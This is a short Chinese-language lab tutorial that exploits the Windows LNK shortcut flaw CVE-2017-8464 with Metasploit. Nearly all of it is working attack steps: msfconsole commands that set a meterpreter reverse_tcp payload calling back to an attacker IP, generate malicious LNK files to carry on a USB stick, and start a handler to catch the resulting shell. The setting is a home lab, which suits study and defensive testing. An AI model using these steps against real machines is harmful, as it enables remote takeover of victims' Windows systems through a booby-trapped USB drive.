影响版本:
windows 10
windwos RT 8.1
windows 8.1
windows 7
windows server 2016
windows server 2012 R2
windows server 2012
windows server 2008 R2
windows server 2008
以下文章中< >里的内容为需要输入的代码,输入的代码也会用标记出来
攻击机:kali,ip:192.168.83.128
靶机:win10
准备工作:下载最新的zip包,下载完成后将压缩包内modules/exploits/windows/fileformat中的cve_2017_8464_lnk_rce.rb复制到目录/usr/share/metasploit-framework/modules/exploits/windows/fileformat下。
2.仅复制rb文件会出错,须再将压缩包内data/exploits中的cve-2017-8464文件夹复制到/usr/share/metasploit-framework/data/exploits中。
打开metaploit,msfconsole,
<msfconsole>
搜索cve_2017_8464<search cve_2017_8464>
使用exploit/windows/fileformat/cve_2017_8464_lnk_rce攻击模块
<use exploit/windows/fileformat/cve_2017_8464_lnk_rce>:
可以用<show options>查看设置是否成功
然后我们需要加载一个攻击模块,
<set payload windows/meterpreter/reverse_tcp>
中间可以用<ifconfig>查看攻击机的ip
设置攻击机的ip
<set lhost 192.168.83.128>
然后<exploit>运行(run应该也可以)会生成许多lnk文件
现在我们要将这些lnk文件复制到U盘里,这些lnk文件会自动保存到root/.msf4/local/目录下,注意,mf4是隐藏文件
现在,回到kali,使用监听模块,
<use multi/handler>
回车,然后加载一个payload(这里不小心错输入成paylaod居然也成功了)
<set payload windows/meterpreter/reverse_tcp>(以上24个文件其实只需要2个,但是不确定靶机的U盘系统为E盘或是D盘等等,所以直接保留了D到Z共23个文件,例如:如果靶机系统U盘为E盘只需要保留FlashPlayer_E和FlashPlayerCPLApp.cpl就可以)
设置好攻击机的ip(这里我又用ifconfig查看了ip)
<set lhost 192.168.83.128>
然后运行
<exploit>
现在,将U盘插入靶机,如果设置自动播放,在攻击机中会反弹一个meterpreter,如果未设置,在靶机中打开下面标记文件也可以
<shell>
拿到shell